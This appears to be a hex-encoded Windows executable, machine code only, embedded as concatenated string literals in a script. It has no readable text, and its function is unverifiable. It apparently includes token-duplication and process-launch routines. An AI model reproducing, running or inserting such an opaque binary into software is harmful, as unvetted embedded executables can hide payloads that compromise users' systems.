'c351518d8de4fbffffe8a6b8ffffc645fc01ffb500fcffff8d8de4fbffffe' \ '836b9ffffbee4024200568d8500fcffff508d8de4fbffffe8c4bcffff8b85' \ '00fcffff3b85ecfbffff0f84a8000000568d8de4fbffffe835bdffff508d8' \ 'd00fcffffe84fbdffffbee8014200568d8d00fcffffc645fc02e83d0f0000' \ '50eb2a50e85e900000598995d0fbffff85c074170fb7c08985dcfbffff8d8' \ '5dcfbffff508bcfe836efffff5653e810850000595985c075cb8b073b4704' \ '752ab201b9f8034200e8535900008b8d00fcffff8d49f0e83bc7ffff8d8de' \ '4fbffffe84bb8ffffe908ffffffc645fc018b8d00fcffff8d49f0e819c7ff' \ 'ff68500242008d8500fcffff508d8de4fbffffe8f3bbffff8b8500fcffff3' \ 'b85ecfbffff745868640242008d8500fcffff508d8de4fbffffc6470c01e8' \ 'cabbffff8b8500fcffff3b85ecfbffff7406c6470d01eb2968680242008d8' \ '500fcffff508d8de4fbffffe89fbbffff8b8500fcffff3b85ecfbffff7404' \ 'c6470e0168700242008d8500fcffff508d8de4fbffffe876bbffff8b8500f' \ 'cffff3b85ecfbffff7404c6470f01be4c024200568d8500fcffff508d8de4' \ 'fbffffe84cbbffff8b8500fcffff3b85ecfbffff7456834f14ff568d8500f' \ 'cffff508d8de4fbffffc6471801e823bbffff8b8500fcffff3b85ecfbffff' \ '742d8b40148378f4007424568d8de4fbffffe88fbbffff85c075048bc3eb0' \ 'd50e8d48e0000598995d0fbffff894714683c0242008d8500fcffff508d8d' \ 'e4fbffffe8d1baffff8b8500fcffff3b85ecfbffff7410807f24007574807' \ 'f1a00756ec647190168380242008d8500fcffff508d8de4fbffffe89cbaff' \ 'ff8b8500fcffff3b85ecfbffff7410807f24007550807f1900754ac6471a0' \ '1be34024200568d8500fcffff508d8de4fbffffe866baffff8b8500fcffff' \ '3b85ecfbffff74568b47703b4774751fb9c8044200eb05b944044200b201e' \ '856570000e90cfeffffb980044200ebed568d8de4fbffffe8b4baffff85c0' \ '75048bc3eb0d50e8f98d0000598995d0fbffff89476c85c07507b91805420' \ '0ebbebe20024200568d8500fcffff508d8de4fbffff889de3fbffffe8e4b9' \ 'ffff8b8500fcffff3b85ecfbffff741c568d8de4fbffffe859baffff508d4' \ 'f1ce8c2baffffc685e3fbffff01be24024200568d8500fcffff508d8de4fb' \ 'ffffe8a2b9ffff8b8500fcffff3b85ecfbffff0f840401000068006042008' \ 'd8df8fbffffe866c4ffff568d8de4fbffffc645fc03e8ffb9ffff508d8ddc' \ 'fbffffe819baffffb83805420050508d8ddcfbffffc645fc04e84e0b00008' \ '<KEY>' \ 'f8fbffffe8de0b000050e8dd8100005959508d4f1ce816baffffb83c05420' \ '050508d4f1ce8060b00008bc8e87d0c00008d8df8fbffffe8da0b0000682c' \ '0242008d8500fcffff508d8de4fbffffc685e3fbffff01e8d6b8ffff8b850' \ '0fcffff3b85ecfbffff741cffb5dcfbffffff1554a1410085c0750c32d2b9' \ '40054200e8c55500008b8ddcfbffff8d49f0e8adc3ffffc645fc018b8df8f' \ 'bffff8d49f0e89bc3ffff681c0242008d8500fcffff508d8de4fbffffe875' \ 'b8ffff8b8500fcffff3b85ecfbffff0f8430010000681c0242008d8de4fbf' \ 'fffe8e2b8ffff508d4f20e84bb9ffff8b47208378f400750ab974054200e9' \ 'f3fdffff80bde3fbffff000f85f700000033c068e603000066898504fcfff' \ 'f8d8506fcffff5350e8c48d000083c40c6894054200e809840000596af6ff' \ '15cca041008bf08d85dcfbffff5056ff15f4a041008b8ddcfbffff83e1fb8' \ '3c9025156ff150ca14100538d8500fcffff5068f30100008d8504fcffff50' \ '56899d00fcffffff1558a141008b8500fcffff03c03de80300000f83a3000' \ '00033c966898c0504fcffff8d8d04fcffff8d41028985f8fbffff668b0183' \ 'c102663bc375f52b8df8fbffff8d8504fcffffd1f951508d4f1ce8e6c0fff' \ 'f68a40142008d4f1ce858090000ffb5dcfbffff56ff150ca1410068a40142' \ '00e848830000803d3280420000590f8507fbffff68400242008d8500fcfff' \ 'f508d8de4fbffffe81cb7ffff8b8500fcffff3b85ecfbffff7424807f1a00' \ '740fb9ac054200e9bafcffffe81e6a0000807f19007403885f19c6472401e' \ 'b2968440242008d8500fcffff508d8de4fbffffe8d3b6ffff8b8500fcffff' \ '3b85ecfbffff7404c6471001686c0242008d8500fcffff508d8de4fbffffe' \ '8aab6ffff8b8500fcffff3b85ecfbffff742c686c0242008d8de4fbffffe8' \ '1bb7ffff508d4f28e884b7ffff8b47288378f400750ab9e8054200e92cfcf' \ 'fff68480242008d8500fcffff508d8de4fbffffe859b6ffff8b8500fcffff' \ '3b85ecfbffff7414807f2400750ab90c064200e9f7fbffffc6472c0168740' \ '242008d8500fcffff508d8de4fbffffe820b6ffff8b8500fcffffbe004000' \ '003b85ecfbffff7403897730687c0242008d8500fcffff508d8de4fbffffe' \ '8f3b5ffff8b8500fcffff3b85ecfbffff740389773068940242008d8500fc' \ 'ffff508d8de4fbffffe8cbb5ffff8b8500fcffff3b85ecfbffff7407c7473' \ '00080000068ac0242008d8500fcffff508d8de4fbffffe89fb5ffff8b8500' \ 'fcffff3b85ecfbffff7407c747308000000068b80242008d8500fcffff508' \ 'd8de4fbffffe873b5ffff8b8500fcffff3b85ecfbffff7407c74730000100' \ '0068cc0242008d8500fcffff508d8de4fbffffe847b5ffff8b8500fcffff3' \ 'b85ecfbffff7407c747304000000068000342008d8500fcffff508d8de4fb' \ 'ffffe81bb5ffff8b8500fcffff3b85ecfbffff7404c6473c0168180342008' \ 'd8500fcffff508d8de4fbffffe8f2b4ffff8b8500fcffff3b85ecfbffff74' \ '07c687a000000001bee8024200568d8500fcffff508d8de4fbffffe8c5b4f' \ 'fff8b8500fcffff3b85ecfbffff0f84ef000000807f0c00750ab93c064200' \ 'e95ffaffff568d8de4fbffffe826b5ffff508d8df8fbffffe840b5ffffc64' \ '5fc058b85f8fbffff8378f4007517b960064200b201e8885100008b8df8fb' \ 'ffffe930f8ffff8d8df8fbffffe8110700006a5c50e8687a00008bf059598' \ '5f6745a33c06689068d8db0fbffff83c602e867e7ffff8bcec645fc06e8c0' \ 'b7ffff50568d8db0fbffffe89fbdffff8d85b0fbffff508d4f50e868e9fff' \ 'fc645fc058b8db4fbffff8d49f0e80cbfffff8b8db0fbffff8d49f0e8febe' \ 'ffff8d8df8fbffffe8ca060000ffb5f8fbffff8d4f48e8d7b4ffffc645fc0' \ '18b8df8fbffff8d49f0e8d3beffff68f40242008d8500fcffff508d8de4fb' \ 'ffffe8adb3ffff8b8500fcffff3b85ecfbffff0f84f40100008d77508b063' \ 'b4604740ab988064200e943f9ffff807f0c00750ab9d0064200e933f9ffff' \ '68f40242008d8de4fbffffe8f6b3ffff508d8df8fbffffe810b4ffffc645f' \ 'c078b95f8fbffff837af400750ab9f4064200e9cbfeffff8d8d00fcffffe8' \ '65560000508d8df8fbffffc645fc08e89cbdffffc645fc078b8d00fcffff8' \ 'd49f0e823beffff68006042008d8ddcfbffffe8eabdffffc645fc098b8df8' \ 'fbffff8d95dcfbffffe8c256000084c075138b8ddcfbffff8d49f0e8ecbdf' \ 'fffe969feffff8d8df8fbffffe8850500006a5c50e8dc780000595985c074' \ '0533c96689088d8df8fbffffe895050000ffb5f8fbffff8d4f48e8a2b3fff' \ 'f68a40142008d8ddcfbffffe84905000050e8487b00005959e99d00000050' \ '8d8d00fcffffe82db3ffff8d8d00fcffffc645fc0ae8be0300008b8500fcf' \ 'fff8378f400744b8d8db0fbffffe883e5ffff8d8500fcffff508d8db0fbff' \ 'ffc645fc0be8b2bcffff8d85b0fbffff508bcee887e7ffff8b8db4fbffff8' \ 'd49f0e82fbdffff8b8db0fbffff8d49f0e821bdffff68a401420053e8c47a' \ '00005959c645fc098b8d00fcffff8985d0fbffff8d49f0e8fcbcffff8b85d' \ '0fbffff85c00f855bffffff8b063b46047511b201b920074200e8e54e0000' \ 'e9dcfeffff8b8ddcfbffff8d49f0e8c8bcffffc645fc018b8df8fbffff8d4' \ '9f0e8b6bcffff68540242008d85d0fbffff508d8de4fbffffe890b1ffff8b' \ '85d0fbffff3b85ecfbffff7414807f0c00750ab944074200e92ef7ffffc64' \ '7440168080342008d85d0fbffff508d8de4fbffffe857b1ffff8b85d0fbff' \ 'ff3b85ecfbffff742c68080342008d8de4fbffffe8c8b1ffff508d4f40e83' \ '1b2ffff8b47408378f400750ab96c074200e9d9f6ffffbe10034200568d85' \ 'd0fbffff508d8de4fbffffe805b1ffff8b85d0fbffff3b85ecfbffff74428' \ '07f0f00740ab998074200e9a3f6ffff568d8de4fbffffe86ab1ffff85c075' \ '048bc3eb0d50e8af840000598995d0fbffff89476885c0750ab9e0074200e' \ '<KEY>' \ 'd8fbffffe8305e00008bf0595985f60f845af4ffffffb5d8fbffff8d8d00f' \ 'cffffe82ab1ffffc645fc0c8bce2b8dd8fbffffd1f9518d8dd0fbffff518b' \ '<KEY>' \ 'bffffc645fc018b8d00fcffff8d49f0e83abbffff83c602eb7451eb0c6639' \ '1e741183c6020fb70650e89f5d00005985c074eaffb5d8fbffff8d8d00fcf' \ '<KEY>' \ 'e8510200008d4f3450c645fc0fe848baffff8b8dd0fbffff8d49f0e8d3baf' \ '<KEY>' \ '084200e95bf5ffff8bcee898efffff508d4f38e890b0ffff807f0c000f84b' \ '80000008d8db0fbffffe8abe2ffff8d4734508d8db0fbffffc645fc10e8dd' \ 'b9ffff8d8db0fbffff518d4f5ce8b1e4ffff8d77508b063b4604750e8d85b' \ '<KEY>' \ 'e881e4ffff83c61c3b775475ef33db8bcfe87cdaffff84c0752ab201b9580' \ '84200e8204c00008b8db4fbffff8d49f0e808baffff8b8db0fbffff8d49f0' \ 'e8fab9ffffeb1e8b8db4fbffff8d49f0e8eab9ffff8b8db0fbffff8d49f0e' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'b7ffff8b0f8bd08b41f48bf02bf38d0445020000008d0c7502000000518d0' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '8eb13e827ddffff8b4d08505657e8e8aeffff8b45085f5ec9c20800568bf1' \ '8b1683ea10837a0c017e0dff7204e85eb5ffff8b1683ea10ff4a0c8b420c6' \ '<KEY>' \ '<KEY>' \ '32c393e77282b3ec1ff023b4608750651e8c3dcffff8b5e048b0e895d0889' \ '5df08365fc0085db74338b0cb9eb213b4608750651e8a0dcffff8b5e04895' \ 'd08895df0c745fc0100000085db740f8b0f83e910e8a9b6ffff83c0108903' \ '83460404e82d8b0000c20400558bec53568b75088bd985f6746b66833e007' \ '465578b3beb130fb7c05056e8fd590000595985c0740b83c7020fb7076685' \ '<KEY>' \ 'bf02bf78d0445020000008d0c7502000000518d0c7a515052e81400000083' \ 'c4108bcb56e860b5ffff5f5e8bc35b5dc20400558becff7514ff7510ff750' \ 'cff7508e8b85a000050e834b3ffff83c4145dc36a04b8ae914100e8a18a00' \ '008bf28bf9ff15c0a0410056578d45f068d808420050e88e46000083c4108' \ '365fc008b30ff15c0a041008bd08bcee84a4800008b4df08d49f0e8a8b6ff' \ 'ffe83c8a0000c36a04b8ae914100e8528a00008bda8bf1568d4df0e82facf' \ 'fff8365fc006a405633ffe80a590000595985c075386a5c56e8fc58000059' \ '5985c07425be2c014200568d4df0e802feffff50e801740000566a008bf8e' \ '8f773000083c4108bf0eb05bf28fd4100568bcbe827acffff8b4d0857e81e' \ 'acffff8b4df08d49f0e821b6ffffe8b5890000c36a24b802924100e8cb890' \ '0008955d08bf9897de88365d400807f24000f84a30000008b878800000033' \ 'db4383f8ff740885c00f853f03000033d2b928094200e81d4a0000e8a80b0' \ '00089878800000083f8ff745e85c0745a32d2b998094200e8c14700008365' \ 'ec008d45ec50536a026a006800000002ffb788000000ff156ca0410085c07' \ '41affb788000000ff15c4a041008b45ec898788000000e9d70200006a715a' \ 'b9c8094200e87dfeffffe9c5020000b201b950094200e86747000032c0e9b' \ '40200008b47208378f4000f84a2010000be00604200568d4de0e812b5ffff' \ '8365fc00568d4de4e805b5ffff33db438d45e4885dfc8b4f20508d55e0895' \ 'ddce874feffff8b7de459837ff4007518568d4dece8dab4ffff8d4dece8d1' \ 'b1ffff8b75ec8bcbeb118d4ff0e8f3b3ffff8d70106a028975ec598b45e88' \ 'b5de0894df08d8888000000516a036a02ff701c8d55ec894dd4ff3253ff15' \ '54a041008945d88b45f0a802740e83e0fd8d4ef08945f0e8a5b4ffff33c04' \ '08945fc8b4df084c8740b8b4dec8d49f0e88db4ffffff15c0a04100837dd8' \ '008945ec0f84870000008b75d4833eff747f833e00747a8365ec008d45ec5' \ '06a016a026a006800000002ff36ff156ca0410085c0740fff36ff15c4a041' \ '008b45ec8906eb0fba88000000b9c8094200e83ffdffff833eff746c833e0' \ '074678b45e880781000755e33d2b9040a4200e85748000033d2b92c0a4200' \ 'e84b480000ff7508ff36ff1578a241008b4dd08901eb348b45e8ff70208d4' \ '5d068d409420050e8a243000083c40cc645fc048b55ec8b08e8654500008b' \ '4dd08d49f0e8c3b3ffffc645dc008d4ff0e8b7b3ffff8d4bf0e8afb3ffff8' \ 'a45dce905010000837d0c00742fff750cff1550a041008bf0ff15c0a04100' \ '85f6750e8bd0b9500a4200e817450000eb0c32d2b9940a4200e87c450000f' \ 'f155ca141008b3530a141006a0233db43538945e86a008d45e850ffd650ff' \ '75e8ffd650ff1560a14100ff15c0a0410081c78800000057536a0aff75e8f' \ 'f154ca041008bf0ff15c0a041003df00300007518576a0aff1530a1410050' \ 'ff1568a041008bf0ff15c0a0410085f67512ff15c0a041008bd0b9c00a420' \ '0e8894400008365dc008d45dc50536a026a006800000002ff37ff156ca041' \ '0085c0740fff37ff15c4a041008b45dc8907eb0fbab3000000b9c8094200e' \ '8c5fbffffff1548a04100833fff7405833f00750233db8ac3e836860000c3' \ '68bc000000b897924100e8498600008bf18975c46a0733c033db895de4598' \ 'dbd3cfffffff3ab8b4620898540ffffff528d8538ffffff508d55b08bce89' \ '5db0c78538ffffff20000000c7853cffffff01000000e829fcffff595984c' \ '00f842007000033c0895db48d7db8abab6a40ab8d855cffffff5350e8c67c' \ '000083c40c33ff6a0558668945888b869800000047c78558ffffff4400000' \ '0897d8483f8ff742085c0741c8945988b86940000008945908b8690000000' \ '894594c7458401010000ff76348d45f068040b420050e88d41000083c40c8' \ '95dfc8b46388378f400741d57683c0542008d4df0e898d7ffff8b46388d4d' \ 'f0ff70f450e889d7ffff8b46288bcb3948f4895dec0f45c8807e1800894dd' \ '4895da0895da4895da87506807e2c007443ff76148d55a08bcee8ecc4ffff' \ '5985c0750cb201b9100b4200e86443000083bd60ffffff00b9580b42000f4' \ '58d60ffffff807e2c00b8780b42000f44c1898560ffffff8dbe880000006a' \ '01ff378d45e850895de8897dc8ff1574a24100837de8006a14b9140400005' \ '80f45c1807e3c008945dc7405e816480000807e1a00740f8bcfe87a080000' \ '84c00f84c2050000807e1900740f8bcfe8e709000084c00f84ad050000bb0' \ '0604200538d4dace89db0ffff538d4dccc645fc01e890b0ffff8d45ccc645' \ 'fc028b4e20508d55ace804faffff807e24008b5dac8b7dcc590f84d300000' \ '0ff75f08d45d868a00b420050e84740000083c40cc645fc038b0832d2e87e' \ '420000c645fc028b4dd88d49f0e865b0ffff8b868800000083f8ff740485c' \ '0750cb201b9fc0b4200e85442000033d2b9280c4200e884440000ffb68800' \ '0000ff1544a0410085c07512ff15c0a041008bd0b9580c4200e8b34100003' \ '3d2b9840c4200e85644000033d2b9c00c4200e84a4400008d45b4508d8558' \ 'ffffff50ff75d433c0ff75e88d4df0ff75dc6a015050e88bf7ffff506a00f' \ 'fb688000000ff1540a041008945e4ff15c0a041008945ece9d30100008b46' \ '208378f4000f84d901000050ff75f08d45d868f80c420050e8663f000083c' \ '410c645fc048b0832d2e89d410000c645fc028b4dd88d49f0e884afffff80' \ '7e1a000f85de000000837ff400752768006042008d4dd0e83eafffff8d4dd' \ '0e835acffff8d45d08945d833c0c645fc068b75d040eb1e8d4ff0e84caeff' \ 'ff8d70108975d08d45d06a028945d8c745fc07000000588945e48945ec8b4' \ '5c48d4df08b401c8945e08d45b4508d8558ffffff50ff75d4ff75e8ff75dc' \ 'e8adf6ffff8b4dc45033c03841106a000f94c050ff75e08b45d8ff3053ff1' \ '53ca041008945e48b45eca802741183e0fd8d4ef08945ece8ceaeffff8b45' \ 'ecc745fc02000000a801740b8b4dd08d49f0e8b5aeffffff15c0a041008d4' \ 'df08945ece87bf6ffff8b75c48b45e4eb0533c08945e485c00f85fe010000' \ '8b868800000083f8ff0f848902000085c00f848102000033d2b9840c4200e' \ '8b242000033d2b9c00c4200e8a642000033d2b9280c4200e89a420000ffb6' \ '88000000ff1544a0410085c07512ff15c0a041008bd0b9580c4200e8c93f0' \ '0008d45b4508d8558ffffff50ff75d433c0ff75e88d4df068140400006a01' \ '5050e8b7f5ffff506a00ffb688000000ff1540a041008945e4ff15c0a0410' \ '0f7d81bc02145ec8d4df0e8bef5ffffff1548a04100e941010000ff75f08d' \ '45e068400d420050e88e3d000083c40cc645fc088b0832d2e8c53f0000c64' \ '5fc028b4de08d49f0e8acadffff33d2b9840c4200e8e641000033d2b9c00c' \ '4200e8da41000033d2b9280c4200e8ce41000033c039868800000074368d4' \ 'db4518d8d58ffffff51ff75d48d4df0ff75e8ff75dc6a015050e807f5ffff' \ '506a00ffb688000000ff1540a041008945e485c0752c8d4db4518d8d58fff' \ 'fff51ff75d48d4df0ff75e8ff75dc6a015050e8d1f4ffff506a00ff1564a1' \ '41008945e4ff15c0a041008bc8894dec85c9746aff75988b55d4ff759485d' \ '2ff7590b89c0d42000f45c2837de80050ba9c0d4200b8ac0d42000f44c283' \ 'be880000000050b8b80d42000f44c250ff75f08d45e05168d00d420050e88' \ '53c000083c428c645fc098b0832d2e8bc3e0000c645fc028b4de08d49f0e8' \ 'a3acffff8d4df0e872f4ffff837de4000f849a000000803d3380420000740' \ 'c32d2b9b00e4200e8863e00008b45bc8b4db4894e7c8986800000008b063b' \ '4604745133c08945d88945dc8d45d8508d45dc5051ff1568a141008b0633c' \ '9894ddc394604742133ff0fb70833d24249d3e283c0022355d80bfa897ddc' \ '<KEY>' \ '0a14100ff75b8ff1574a14100ff75b8ff15c4a04100eb4fff75f08d45e068' \ 'dc0e420050e8a93b000083c40cc645fc0a8b55ec8b08e86c3d0000c645fc0' \ '28b4de08d49f0e8c6abffff817dece40200007515803d3380420000750c32' \ 'd2b9080f4200e8b23d0000807da80074116a048d45a0506a0cff75a4ff156' \ '0a04100807e3c007405e838430000837de8007409ff75e8ff1570a2410033' \ 'f68975e83975b07411ffb554ffffff8b45c8ff30ff157ca241008b45c8833' \ '8ff74113930740dff30ff15c4a041008b45c889303975e48d4ff00f95c088' \ '45e0e832abffff8d4bf0e82aabffff8b5de08b4df083c1f0e81cabffff8ac' \ '3e8ae7e0000c36a34b88b914100e8c47e00008bf28bd9895de433ff897dfc' \ '897dec6800604200897de8e8c3aaffff33c0408945ec897dcc897dd0897dd' \ '46a408d4dcc8945fce8bd040000897dd8897ddc897de06a408d4dd8c645fc' \ '02e8a6040000897dc0897dc4897dc8bf00040000578d4dc0c645fc03e88b0' \ '400008d45e850578b7dc0576a0156ff1564a0410085c0742d8365f0008d45' \ 'f050ff37ff1538a0410085c0740aff75f08bcbe85ca0ffff837df0007409f' \ 'f75f0ff1578a1410085ff740757e84b4b000059837dd8007409ff75d8e83c' \ '4b000059837dcc007409ff75cce82d4b0000598bc3e8c47d0000c3558bec6' \ 'aff683291410064a1000000005051b820a00000e874fe0000a16063420033' \ 'c58945ec535657508d45f464a3000000008965f033f668fc9f00008d85ec5' \ 'fffff565089b5e85fffffe88074000083c40c8d85d85fffff506800a00000' \ '8d85e85fffff5089b5d85fffffff1568a2410085c0750ab9800f4200e9100' \ '100008b85d85fffffc1e8028985d45fffff8bfe89b5dc5fffff3bf80f83ec' \ '000000ffb4bde85fffff566800040000ff157ca141008bd8899dd05fffff8' \ '5db0f84aa0000008d85e45fffff50681f0002005389b5e45fffffff1568a0' \ '410085c074798975fc8b95e45fffff8d8de05fffffe823feffff68f80f420' \ '08d8de05fffffc645fc01e8c7a0ffff85c0751f53ff15c4a041008b8de05f' \ 'ffff8bb5e45fffff83c1f0e804a9ffff8bc6eb6f8b8de05fffff8d49f0e8f' \ '2a8ffff834dfcffeb20b874764000c3834dfcff8bbddc5fffff8b9dd05fff' \ 'ff33f6eb06ff15c0a04100ffb5e45fffffff15c4a04100eb06ff15c0a0410' \ '053ff15c4a041008b85d45fffff4789bddc5fffffe90cffffffb910104200' \ 'b201e89d3a000033c08b4df464890d00000000595f5e5b8b4dec33cde8784' \ '90000c9c3558beca1a880420083ec0c5356578bf985c07413833da4804200' \ '00740a8b15a080420085d2754b685c104200ff1528a141008bd885db742f8' \ 'b35a4a04100687810420053ffd6688c10420053a3a0804200ffd668a81042' \ '0053a3a4804200ffd6a3a8804200eb05a1a88042008b15a080420085c00f8' \ '4f5000000833da4804200000f84e800000085d20f84e0000000833fff0f84' \ 'd0000000833f000f84c700000033db538d45fc506a0168000002006a02895' \ 'df8895dfcffd285c07517ff15c0a041008bd0b938114200e83f390000e9a7' \ '000000395dfc743b53538d45f850ff37ff75fcff15a480420085c0751dff1' \ '5c0a041008bd0b990114200e80e390000ff75fcff15a8804200eb70ff75fc' \ 'ff15a8804200837df8ff744e395df87449ff378b35c4a04100ffd68b45f88' \ 'd4df4516a016a02536800000002508907895df4ff156ca0410085c0740bff' \ '37ffd68b45f48907eb0fba59020000b9c8094200e822f0ffffb001eb15b90' \ '0124200eb05b9b8104200b201e80639000032c05f5e5bc9c3558bec83ec10' \ '53568d45f8506a048d45f0508bf16a12ff3633db895df8ff1564a0410085c' \ '0747d837df0030f858f0000008d45f8506a048d45fc506a13ff36895dfcff' \ '1564a0410085c074428d45f4506a016a02536800000002ff75fc895df4ff1' \ '56ca0410085c0740eff75fcff15c4a041008b45f4eb12ba71020000b9c809' \ '4200e87defffff8b45fc8906eb32ff15c0a041008bd0b95c124200e8ec370' \ '00032c0eb1eff15c0a041008bc849741183e956740c8bd0b998124200e8cc' \ '370000b0015e5bc9c3568bf1833e007412ff36e81a47000033c0598906894' \ '<KEY>' \ '76298d34723bf27505895304eb603bf0745c8bc82bc8d1f98d3c09575056e' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'd60f42d652e840ccffff5f5e5dc2040068ecfa4100e86b450000cc558bec6' \ 'aff689d94410064a10000000050b84c000100e874f90000a16063420033c5' \ '8945f0535657508d45f464a3000000008995ccfffeff8bf989bdd8fffeff8' \ 'b450883a5d4fffeff008985d0fffeffbe28fd41008bca668b1133db43663b' \ '<KEY>' \ '9eb041bc90bcb85c90f84d403000050ffb5ccfffeff8d85ccfffeff680413' \ '420050e84834000083c41033c9894dfc384d0c0f84940300008d85c8fffef' \ 'f5051515153898dc8fffeffff1548a241008bb5ccfffeff85c00f85080100' \ '0033c068ffff0000508885ebfffeff8885f0fffeff8d85f1fffeff50e8d56' \ 'e0000838decfffeffff83c40c8d85e0fffeff508d85f0fffeff508d85ecff' \ 'feff50ffb5c8fffeffc785e0fffeff00000100ff154ca2410083a5e4fffef' \ 'f0083bdecfffeff0076468d850400ffff8985dcfffeff56ff30e87a650000' \ '595985c074268b8de4fffeff8b85dcfffeff4183c020898de4fffeff8985d' \ 'cfffeff3b8decfffeff72ceeb06889debfffeffffb5c8fffeffff1544a241' \ '0080bdebfffeff0074486840ff4100ffb5d0fffeffe8e0610000595985c07' \ '40cc6879d00000000e99c0200006830ff4100ffb5d0fffeffe8be61000059' \ '5985c00f8482020000c6879c00000000e97602000033d26a0733c08995a8f' \ 'ffeff598dbdacfffefff3ab8b85d8fffeff8995acfffeff8b48208995b8ff' \ 'feff89b5bcfffeff8995c4fffeff3951f4753568006042008d8de4fffeffe' \ '8d3a2ffff8d8de4fffeffe8c79fffff8d95e4fffeffc645fc028bfb8b9de4' \ 'fffeff8995e0fffeffeb2783c1f0e8d6a1ffff8d5810899de4fffeff8d85e' \ '4fffeff6a028985e0fffeffc745fc030000005f8b85d8fffeff89bdd4fffe' \ 'ff8b481c89bdecfffeff8379f400753268006042008d8ddcfffeffe85ca2f' \ 'fff8d8ddcfffeffe8509fffff83cf0489bdecfffeff8bbdd4fffeff8d85dc' \ 'fffeffeb1e83c1f0e862a1ffff838decfffeff088d781089bdd4fffeff8d8' \ '5d4fffeff8b8de0fffeff6a00ff31ff308d85a8fffeff50ff1554a2410089' \ '85e0fffeff8b85ecfffeffa808741783e0f78d4ff08985ecfffeffe80ba2f' \ 'fff8b85ecfffeffa804741d8b8ddcfffeff83e0fb8d49f08985ecfffeffe8' \ 'eaa1ffff8b85ecfffeffa802741783e0fd8d4bf08985ecfffeffe8cfa1fff' \ 'f8b85ecfffeff8365fc0033db4384c3740e8b8de4fffeff8d49f0e8b0a1ff' \ 'ff8bbde0fffeff85ff754e8bbdd0fffeff6840ff410057e8f65f000059598' \ '5c074118b85d8fffeff88989d000000e9ad0000006830ff410057e8d45f00' \ '00595985c00f84980000008b85d8fffeff88989c000000e987000000568d8' \ '5e0fffeff681413420050e80931000083c40cc645fc068b088bd7e8cd3200' \ '008b8de0fffeff8d49f0e828a1ffff8b9dd0fffeff6840ff410053e8785f0' \ '000595985c0740f8b85d8fffeffc6809d00000000eb1e6830ff410053e858' \ '5f0000595985c0740d8b85d8fffeffc6809c0000000032dbeb0f8bb5ccfff' \ 'eff515156ff1550a241008d4ef0e8c9a0ffff8ac38b4df464890d00000000' \ '595f5e5b8b4df033cde8ae410000c9c36838040000b8e3934100e88d74000' \ '08995d0fbffff8bd9899dc4fbffff33c0680e040000668985e0fbffff33ff' \ '8d85e2fbffff5750e8196b000083c40c8d85e0fbffff68080200005057ff1' \ '544a141008d85e0fbffff6a5c50e8575b0000595968481342008d8dccfbff' \ 'ffe8e395ffff8bf08b95d0fbffff8d8dc0fbffff897dfce8b0030000568bd' \ '08d8dc8fbffffc645fc01e88b1e0000c645fc02ff308d85dcfbffff536854' \ '13420050e8c02f000083c4148b8dc8fbffff8d49f0e8ec9fffff8b8dc0fbf' \ 'fff8d49f0e8de9fffffc645fc068b8dccfbffff8d49f0e8cc9fffffb928fd' \ '41008bc3668b10663b11751e6685d27415668b5002663b5102750f83c0048' \ '<KEY>' \ '508d8ddcfbffffe88f9dffff50ff1550a141006aff8d8ddcfbffffe8b1c3f' \ 'fff6a01682c0142008d8ddcfbffffe845c5ffff68481342008d8dd4fbffff' \ 'e8f094ffff8bf08b95d0fbffff8d8dd8fbffffc645fc07e8bc020000568bd' \ '08d8dbcfbffffc645fc08e8971d000059c645fc098b008d8ddcfbffffff70' \ 'f450e8f6c4ffff8b8dbcfbffff8d49f0e8fd9effff8b8dd8fbffff8d49f0e' \ '8ef9effffc645fc068b8dd4fbffff8d49f0e8dd9effff8bb5dcfbffff8b1d' \ '54a14100eb1aff15c0a04100478985d4fbffff83ff467d116a64ff1500a14' \ '10056ffd385c074dfeb3affb5c4fbffff8d85d8fbffff56687413420050e8' \ '572e000083c410c645fc0a8b95d4fbffff8b08e8173000008b8dd8fbffff8' \ 'd49f0e8729effff8d4ef0e86a9effffe812720000c36824040000b8639341' \ '00e8447200008bf289b5d4fbffff8bf98bd78d8dd8fbffffe8c7010000836' \ '5fc006a0468481342008d8dd8fbffffe813c4ffffffb5d8fbffff8d85dcfb' \ 'ffff56685413420050e8d32d000033db33c043680e040000885dfc5066898' \ '5e0fbffff8d85e2fbffff50e89568000083c41c8d85e0fbffff6808020000' \ '506a00ff1544a14100b928fd41008bc6668b10663b11751e6685d27415668' \ 'b5002663b5102750f83c00483c1046685d275de33c0eb041bc00bc385c075' \ '4cb80802000050508d8ddcfbffffe8a09bffff50ff1550a141006aff8d8dd' \ 'cfbffffe8c2c1ffff53682c0142008d8ddcfbffffe857c3ffff8b85d8fbff' \ 'ff8d8ddcfbffffff70f450e842c3ffff8bb5dcfbffff8d85e0fbffff5650e' \ '8e85e0000595985c00f84a50000006a00568d85e0fbffff50ff1580a14100' \ '85c00f858700000038879c000000757f380532804200751e8b95d4fbffff5' \ '36830ff41008bcfe8d6f7ffff803d32804200005959740432dbeb5b6a0056' \ '8d85e0fbffff50ff1580a1410085c07541ff15c0a041008bf8568d85e0fbf' \ 'fff508d85d0fbffff68b013420050e87e2c000083c410c645fc028b088bd7' \ 'e8422e00008b8dd0fbffff8d49f0e89d9cffffeb06889f9e0000008d4ef0e' \ '88d9cffff8b8dd8fbffff83c1f0e87f9cffff8ac3e825700000c368e40700' \ '00b8db944100e8577000008bf133db899d10f8ffff389aa0000000740f683' \ '0144200e8f291ffffe9ba00000068401442008d8d1cf8ffffe8dd91ffff33' \ 'c0895dfc68ce07000066898520f8ffff8d8522f8ffff5350e8bf66000083c' \ '40c8d8514f8ffff508d8520f8ffff506a04c78514f8ffffe8030000ff1584' \ 'a141008d8520f8ffff50ff1588a14100508d8518f8ffff685014420050e89' \ 'a2b000083c410c645fc018b008d8d1cf8ffffff70f450e8aac1ffff885dfc' \ '8b8d18f8ffff8d49f0e8ae9bffff8b8d1cf8ffff8d49f0e8a79affff8b8d1' \ 'cf8ffff83c0108d49f08906e88d9bffff8bc6e8336f0000c36a54b8539741' \ '00e8686f00008955ac8bf1b928fd41008bc6668b10663b11751e6685d2741' \ '5668b5002663b5102750f83c00483c1046685d275de33c0eb051bc083c801' \ '33c9683f000f0085c00f44f15156ff1534a041008365a8008b3dc0a041008' \ 'bd883fbff740485db75338b45ac80b89d00000000752a6a016840ff41008b' \ 'd68bc8e8d4f5ffff5959683f000f006a0056ff1534a041008bd8ffd78945a' 